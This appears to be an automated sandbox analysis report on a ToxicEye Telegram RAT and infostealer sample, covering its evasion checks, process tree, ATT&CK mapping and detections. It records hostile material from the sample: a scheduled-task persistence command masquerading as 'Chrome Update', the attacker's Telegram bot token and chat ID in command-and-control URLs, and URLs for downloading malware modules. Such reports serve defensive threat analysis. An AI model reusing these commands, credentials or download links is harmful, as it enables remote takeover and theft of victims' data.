Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\ToxicEye\rat.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: dAIJ6g47mZ.exe, rat.exe.0.dr

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\ToxicEye\rat.exe

Code function: 10_2_00007FFD348811F7 sldt word ptr [eax]

10_2_00007FFD348811F7

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe TID: 6600	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\ToxicEye\rat.exe TID: 6804	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\ToxicEye\rat.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: Amcache.hve.18.dr	Binary or memory string: VMware
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.18.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.18.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.18.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.18.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.18.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.18.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: rat.exe, 0000000A.00000002.2170080908.0000023F1DAD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
Source: Amcache.hve.18.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.18.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.18.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.18.dr	Binary or memory string: vmci.syshbin`
Source: rat.exe.0.dr	Binary or memory string: vmware
Source: Amcache.hve.18.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	Binary or memory string: PreventStartOnVirtualMachine
Source: Amcache.hve.18.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.18.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.18.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.18.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.18.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.18.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.18.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.18.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.18.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rat.exe, 0000000A.00000002.2170080908.0000023F1DB07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: rat.exe.0.dr	Binary or memory string: VMwareVBox
Source: dAIJ6g47mZ.exe, 00000000.00000002.2072581575.000001F37FD24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.18.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\ToxicEye\rat.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\ToxicEye\rat.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe	Jump to behavior
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 2960"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\ToxicEye\rat.exe "rat.exe"	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe	Jump to behavior

Source: dAIJ6g47mZ.exe, rat.exe.0.dr

Binary or memory string: Shell_TrayWnd)<

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match	File source: dAIJ6g47mZ.exe, type: SAMPLE
Source: Yara match	File source: C:\Users\ToxicEye\rat.exe, type: DROPPED

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Queries volume information: C:\Users\user\Desktop\dAIJ6g47mZ.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Queries volume information: C:\Users\ToxicEye\rat.exe VolumeInformation	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Queries volume information: C:\Users\ToxicEye\rat.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Contains functionality to disable the Task Manager (.Net Source)

Source: dAIJ6g47mZ.exe, commands.cs	.Net Code: handle
Source: rat.exe.0.dr, commands.cs	.Net Code: handle

Source: Amcache.hve.18.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: dAIJ6g47mZ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\ToxicEye\rat.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: dAIJ6g47mZ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dAIJ6g47mZ.exe PID: 2960, type: MEMORYSTR
Source: Yara match	File source: C:\Users\ToxicEye\rat.exe, type: DROPPED

Yara detected ToxicEye

Source: Yara match	File source: dAIJ6g47mZ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dAIJ6g47mZ.exe PID: 2960, type: MEMORYSTR
Source: Yara match	File source: C:\Users\ToxicEye\rat.exe, type: DROPPED

Source: Yara match	File source: dAIJ6g47mZ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dAIJ6g47mZ.exe PID: 2960, type: MEMORYSTR
Source: Yara match	File source: C:\Users\ToxicEye\rat.exe, type: DROPPED

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: dAIJ6g47mZ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dAIJ6g47mZ.exe PID: 2960, type: MEMORYSTR
Source: Yara match	File source: C:\Users\ToxicEye\rat.exe, type: DROPPED

Yara detected ToxicEye

Source: Yara match	File source: dAIJ6g47mZ.exe, type: SAMPLE
Source: Yara match	File source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dAIJ6g47mZ.exe PID: 2960, type: MEMORYSTR
Source: Yara match	File source: C:\Users\ToxicEye\rat.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	111 Windows Management Instrumentation	1 Scheduled Task/Job	12 Process Injection	111 Masquerading	1 Input Capture	331 Security Software Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Web Service	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	1 Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	3 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	11 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Scripting	Logon Script (Windows)	Logon Script (Windows)	151 Virtualization/Sandbox Evasion	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	1 Ingress Tool Transfer			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	2 Non-Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	23 System Information Discovery	SSH	Keylogging	Scheduled Transfer	13 Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Scripting	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
dAIJ6g47mZ.exe	96%	ReversingLabs	ByteCode-MSIL.Infostealer.AdamantiumTheif
dAIJ6g47mZ.exe	77%	Virustotal		Browse
dAIJ6g47mZ.exe	100%	Avira	HEUR/AGEN.1307065
dAIJ6g47mZ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\ToxicEye\rat.exe	100%	Avira	HEUR/AGEN.1307065
C:\Users\ToxicEye\rat.exe	100%	Joe Sandbox ML
C:\Users\ToxicEye\rat.exe	96%	ReversingLabs	ByteCode-MSIL.Infostealer.AdamantiumTheif
C:\Users\ToxicEye\rat.exe	77%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
https://raw.githubusercontent.com/tedburke/CommandCam/master/CommandCam.exe	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSw	100%	Avira URL Cloud	malware
https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zip	100%	Avira URL Cloud	malware
https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libs	100%	Avira URL Cloud	malware
https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dl	100%	Avira URL Cloud	malware
https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/Te	100%	Avira URL Cloud	malware
https://raw.githubusercontent.com/tedburke/CommandCam/master/CommandCam.exe	3%	Virustotal		Browse
https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zip	12%	Virustotal		Browse
https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dl	1%	Virustotal		Browse
https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSw	7%	Virustotal		Browse
https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libs	7%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
google.com	142.251.15.139	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921	false		high
https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921&text=%F0%9F%8D%80%20Bot%20connected	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSw	rat.exe.0.dr	false	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://api.telegram.org	rat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DCEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	dAIJ6g47mZ.exe, rat.exe.0.dr	false		high
https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendLocation?chat_id=6193	dAIJ6g47mZ.exe, rat.exe.0.dr	false		high
https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dl	dAIJ6g47mZ.exe, rat.exe.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libs	rat.exe.0.dr	false	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zip	dAIJ6g47mZ.exe, rat.exe.0.dr	false	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ip-api.com/json/	dAIJ6g47mZ.exe, rat.exe.0.dr	false		high
https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/send	dAIJ6g47mZ.exe, rat.exe.0.dr	false		high
https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=	dAIJ6g47mZ.exe, rat.exe.0.dr	false		high
https://raw.githubusercontent.com/tedburke/CommandCam/master/CommandCam.exe	dAIJ6g47mZ.exe, rat.exe.0.dr	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.18.dr	false		high
https://api.mylnikov.org/geolocation/wifi?bssid=	dAIJ6g47mZ.exe, rat.exe.0.dr	false		high
https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=61934	rat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DCE4000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DC48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/getUpdates	dAIJ6g47mZ.exe, rat.exe.0.dr	false		high
https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/Te	dAIJ6g47mZ.exe, 00000000.00000002.2072581575.000001F37FD4E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://api.telegram.org	rat.exe, 0000000A.00000002.2170409712.0000023F1DD10000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dAIJ6g47mZ.exe, 00000000.00000002.2072333627.000001F367981000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DBE9000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000C.00000002.2093053581.000001EF99EB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/file/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/	dAIJ6g47mZ.exe, rat.exe.0.dr	false		high
https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage	rat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/getFile?file_id=	dAIJ6g47mZ.exe, rat.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
142.251.15.139	google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1379470
Start date and time:	2024-01-23 13:18:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
